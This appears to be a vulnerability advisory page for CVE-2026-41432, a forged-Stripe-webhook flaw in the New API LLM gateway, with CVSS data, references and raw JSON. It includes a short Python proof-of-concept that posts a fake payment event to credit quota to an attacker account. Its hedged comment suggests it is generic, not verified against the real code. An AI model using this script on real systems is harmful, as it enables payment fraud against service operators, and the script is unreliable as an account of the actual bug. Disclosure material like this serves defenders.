Security Vulnerability Report
CVE-2026-41432 CVSS 7.1 HIGH

CVE-2026-41432

Published: 2026-05-08 23:16:35
Last Modified: 2026-05-12 03:16:13

Description

New API is a large language model (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.12.10, a vulnerability exists in the Stripe webhook handler that allows an unauthenticated attacker to forge webhook events and credit arbitrary quota to their account without making any payment. This issue has been patched in version 0.12.10.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

New API < 0.12.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# Target URL (Replace with actual target)
target_url = "http://target-url/api/stripe/webhook"

# Forge a Stripe payment success event payload
payload = {
    "id": "evt_1234567890",
    "type": "payment_intent.succeeded",
    "data": {
        "object": {
            "id": "pi_1234567890",
            "amount": 100000,  # Amount in cents (e.g., $1000.00)
            "currency": "usd",
            "metadata": {
                "user_id": "attacker_user_id"  # Target user ID to credit
            }
        }
    }
}

# In a vulnerable version, signature verification might be missing or bypassable
headers = {
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)
    if response.status_code == 200:
        print("[+] Webhook sent successfully. Check account balance.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

https://github.com/QuantumNous/new-api/releases/tag/v0.12.10 (patched release v0.12.10)
https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4 (GitHub security advisory GHSA-xff3-5c9p-2mr4)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-41432",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T23:16:35.457",
    "lastModified": "2026-05-12T03:16:12.823",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "New API is a large language mode (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.12.10, a vulnerability exists in the Stripe webhook handler that allows an unauthenticated attacker to forge webhook events and credit arbitrary quota to their account without making any payment. This issue has been patched in version 0.12.10."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-345"},
          {"lang": "en", "value": "CWE-863"},
          {"lang": "en", "value": "CWE-1188"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/QuantumNous/new-api/releases/tag/v0.12.10",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}